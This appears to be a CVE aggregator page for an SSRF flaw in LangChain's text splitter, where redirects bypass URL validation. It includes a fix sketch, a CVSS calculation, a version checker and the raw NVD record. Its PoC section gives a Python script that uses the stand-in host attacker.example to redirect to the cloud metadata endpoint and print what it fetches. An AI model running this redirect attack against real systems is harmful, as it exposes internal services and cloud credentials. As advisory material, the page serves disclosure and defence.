CVE-2026-41481

Description

LangChain is a framework for building agents and LLM-powered applications. Prior to langchain-text-splitters 1.1.2, HTMLHeaderTextSplitter.split_text_from_url() validated the initial URL using validate_safe_url() but then performed the fetch with requests.get() with redirects enabled (the default). Because redirect targets were not revalidated, a URL pointing to an attacker-controlled server could redirect to internal, localhost, or cloud metadata endpoints, bypassing SSRF protections. The response body is parsed and returned as Document objects to the calling application code. Whether this constitutes a data exfiltration path depends on the application: if it exposes Document contents (or derivatives) back to the requester who supplied the URL, sensitive data from internal endpoints could be leaked. Applications that store or process Documents internally without returning raw content to the requester are not directly exposed to data exfiltration through this issue. This vulnerability is fixed in 1.1.2.
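
One way to close the gap described above is to validate every redirect hop rather than only the initial URL. The following is a minimal sketch using only the Python standard library; it is not the patch shipped in 1.1.2. The names is_safe_url, UnsafeURLError, ValidatingRedirectHandler, and fetch_html are hypothetical, and is_safe_url is a simplified stand-in for a validator such as validate_safe_url().

```python
import ipaddress
import socket
import urllib.request
from urllib.parse import urlparse


class UnsafeURLError(ValueError):
    """Raised when an initial URL or a redirect target fails validation."""


def is_safe_url(url: str) -> bool:
    """Hypothetical validator: accept only http(s) URLs whose host
    resolves exclusively to public (non-internal) addresses."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    try:
        port = parsed.port or (443 if parsed.scheme == "https" else 80)
        infos = socket.getaddrinfo(parsed.hostname, port, proto=socket.IPPROTO_TCP)
    except (socket.gaierror, UnicodeError, ValueError):
        return False
    for info in infos:
        # Drop any IPv6 zone identifier before parsing the address.
        ip = ipaddress.ip_address(info[4][0].split("%")[0])
        if (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_reserved or ip.is_multicast or ip.is_unspecified):
            return False
    return bool(infos)


class ValidatingRedirectHandler(urllib.request.HTTPRedirectHandler):
    """Re-run the URL check on every redirect target before following it."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        if not is_safe_url(newurl):
            raise UnsafeURLError(f"blocked redirect to {newurl!r}")
        return super().redirect_request(req, fp, code, msg, headers, newurl)


def fetch_html(url: str, timeout: float = 10.0) -> bytes:
    """Fetch a URL, validating the initial URL and each redirect hop."""
    if not is_safe_url(url):
        raise UnsafeURLError(f"blocked URL {url!r}")
    opener = urllib.request.build_opener(ValidatingRedirectHandler)
    with opener.open(url, timeout=timeout) as resp:
        return resp.read()
```

Because validation and the actual connection perform separate DNS lookups, this sketch does not defend against DNS rebinding; that would additionally require pinning the resolved address or restricting egress at the network layer.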

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
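
The 6.5 base score can be reproduced from the vector. The sketch below applies the CVSS v3.1 base score equations for the Scope: Unchanged case, using the specification's numeric weights for this vector's metric values; the variable names are illustrative only.

```python
import math

# Metric weights from the CVSS v3.1 specification for
# AV:N / AC:L / PR:N / UI:R / S:U / C:H / I:N / A:N
AV, AC, PR, UI = 0.85, 0.77, 0.85, 0.62
C, I, A = 0.56, 0.0, 0.0


def roundup(value: float) -> float:
    """Round up to one decimal place, as defined in the CVSS v3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


iss = 1 - (1 - C) * (1 - I) * (1 - A)       # impact sub-score
impact = 6.42 * iss                          # Scope: Unchanged formula
exploitability = 8.22 * AV * AC * PR * UI
base_score = roundup(min(impact + exploitability, 10)) if impact > 0 else 0.0

print(round(exploitability, 1), round(impact, 1), base_score)  # 2.8 3.6 6.5
```

The intermediate values match the exploitabilityScore (2.8) and impactScore (3.6) fields in the raw record.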

Configurations (Affected Products)

cpe:2.3:a:langchain:langchain-text-splitters:*:*:*:*:*:*:*:* - VULNERABLE

langchain-text-splitters < 1.1.2
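
To check whether an environment falls in the affected range, the installed package version can be compared against 1.1.2. This is a minimal sketch that assumes plain X.Y.Z release versions (pre-release suffixes are not handled); the helper names parse_release, is_affected, and check_installed are hypothetical.

```python
from importlib import metadata

FIXED_VERSION = (1, 1, 2)  # first release that contains the fix


def parse_release(version: str) -> tuple:
    """Parse a plain 'X.Y.Z' version string into a tuple of integers."""
    return tuple(int(part) for part in version.split(".")[:3])


def is_affected(version: str) -> bool:
    """True if the given version is older than the fixed release."""
    return parse_release(version) < FIXED_VERSION


def check_installed(package: str = "langchain-text-splitters") -> str:
    """Report whether the installed package version is in the affected range."""
    try:
        installed = metadata.version(package)
    except metadata.PackageNotFoundError:
        return f"{package} is not installed"
    status = "AFFECTED" if is_affected(installed) else "not affected"
    return f"{package} {installed}: {status}"


if __name__ == "__main__":
    print(check_installed())
```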

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC Concept for CVE-2026-41481
# This script demonstrates how an attacker might trigger the SSRF.
# It requires a vulnerable version of langchain-text-splitters (< 1.1.2)

from langchain_text_splitters import HTMLHeaderTextSplitter

# 'attacker.example' is a placeholder for a server the attacker controls,
# configured to redirect requests to an internal metadata service (e.g., AWS IMDS)
attacker_controlled_url = "http://attacker.example/redirect_to_metadata"

def exploit_ssrf():
    try:
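        # Initialize the splitter; headers_to_split_on is a required argument
        splitter = HTMLHeaderTextSplitter(
            headers_to_split_on=[("h1", "Header 1"), ("h2", "Header 2")]
        )
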
        # The vulnerable function validates 'attacker_controlled_url' (passes),
        # but follows the redirect to http://169.254.169.254/latest/meta-data/
        print(f"[*] Attempting to split text from URL: {attacker_controlled_url}")
        
        # In vulnerable versions, this triggers the SSRF
        docs = splitter.split_text_from_url(attacker_controlled_url)
        
        print("[+] Request successful. Data retrieved:")
        for doc in docs:
            # If the app prints this back, data is exfiltrated
            print(doc.page_content)
            
    except Exception as e:
        print(f"[-] Exploit failed or error occurred: {e}")

if __name__ == "__main__":
    exploit_ssrf()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41481
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41481
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41481/
[4] VulDB https://vuldb.com/cve/CVE-2026-41481
[5] GitHub Security Advisory https://github.com/langchain-ai/langchain/security/advisories/GHSA-fv5p-p927-qmxr

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41481", "sourceIdentifier": "[email protected]", "published": "2026-04-24T21:16:19.490", "lastModified": "2026-04-28T15:43:13.700", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LangChain is a framework for building agents and LLM-powered applications. Prior to langchain-text-splitters\n 1.1.2, HTMLHeaderTextSplitter.split_text_from_url() validated the initial URL using validate_safe_url() but then performed the fetch with requests.get() with redirects enabled (the default). Because redirect targets were not revalidated, a URL pointing to an attacker-controlled server could redirect to internal, localhost, or cloud metadata endpoints, bypassing SSRF protections. The response body is parsed and returned as Document objects to the calling application code. Whether this constitutes a data exfiltration path depends on the application: if it exposes Document contents (or derivatives) back to the requester who supplied the URL, sensitive data from internal endpoints could be leaked. Applications that store or process Documents internally without returning raw content to the requester are not directly exposed to data exfiltration through this issue. \nThis vulnerability is fixed in 1.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:langchain:langchain-text-splitters:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.1.2", "matchCriteriaId": "6B5FD4DD-C579-4824-8988-4C702E1B2D24"}]}]}], "references": [{"url": "https://github.com/langchain-ai/langchain/security/advisories/GHSA-fv5p-p927-qmxr", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}